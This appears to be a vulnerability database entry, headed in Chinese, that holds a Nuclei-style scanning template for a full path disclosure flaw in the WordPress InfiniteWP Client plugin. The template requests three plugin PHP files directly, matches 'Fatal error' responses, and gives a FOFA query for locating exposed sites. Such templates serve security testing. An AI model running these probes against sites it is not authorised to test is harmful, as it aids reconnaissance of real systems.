漏洞描述
WordPress InfiniteWP Client plugin is vulnerable to full path disclosure via direct access to plugin files.
wp-iwp-client-fpd: WordPress Plugin InfiniteWP Client - Full Path Disclosure
PoC代码[已公开]
id: wp-iwp-client-fpd
info:
name: WordPress Plugin InfiniteWP Client - Full Path Disclosure
author: ritikchaddha
severity: low
description: |
WordPress InfiniteWP Client plugin is vulnerable to full path disclosure via direct access to plugin files.
reference:
- https://wordpress.org/plugins/iwp-client/
metadata:
verified: true
max-request: 3
vendor: developer
product: iwp-client
framework: wordpress
fofa-query: body="/wp-content/plugins/iwp-client/"
tags: wp,wordpress,wp-plugin,fpd,iwp-client,exposure
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/iwp-client/lib/IWPClass.php"
- "{{BaseURL}}/wp-content/plugins/iwp-client/backup/backup.class.php"
- "{{BaseURL}}/wp-content/plugins/iwp-client/lib/phpseclib/Crypt/AES.php"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Fatal error"
- "iwp-client"
- "Uncaught Error:"
condition: and
- type: status
status:
- 200
# digest: 490a00463044022002f74a8b11bac74e1538df15798dc4b0f0250c53037287f63074a02de30eea1402207fcc0f8ed6f50fbc65612e635c9cbc3185181c440e6ef6d9d3c26126f41464d9:922c64590222798bb761d5b6d8e72950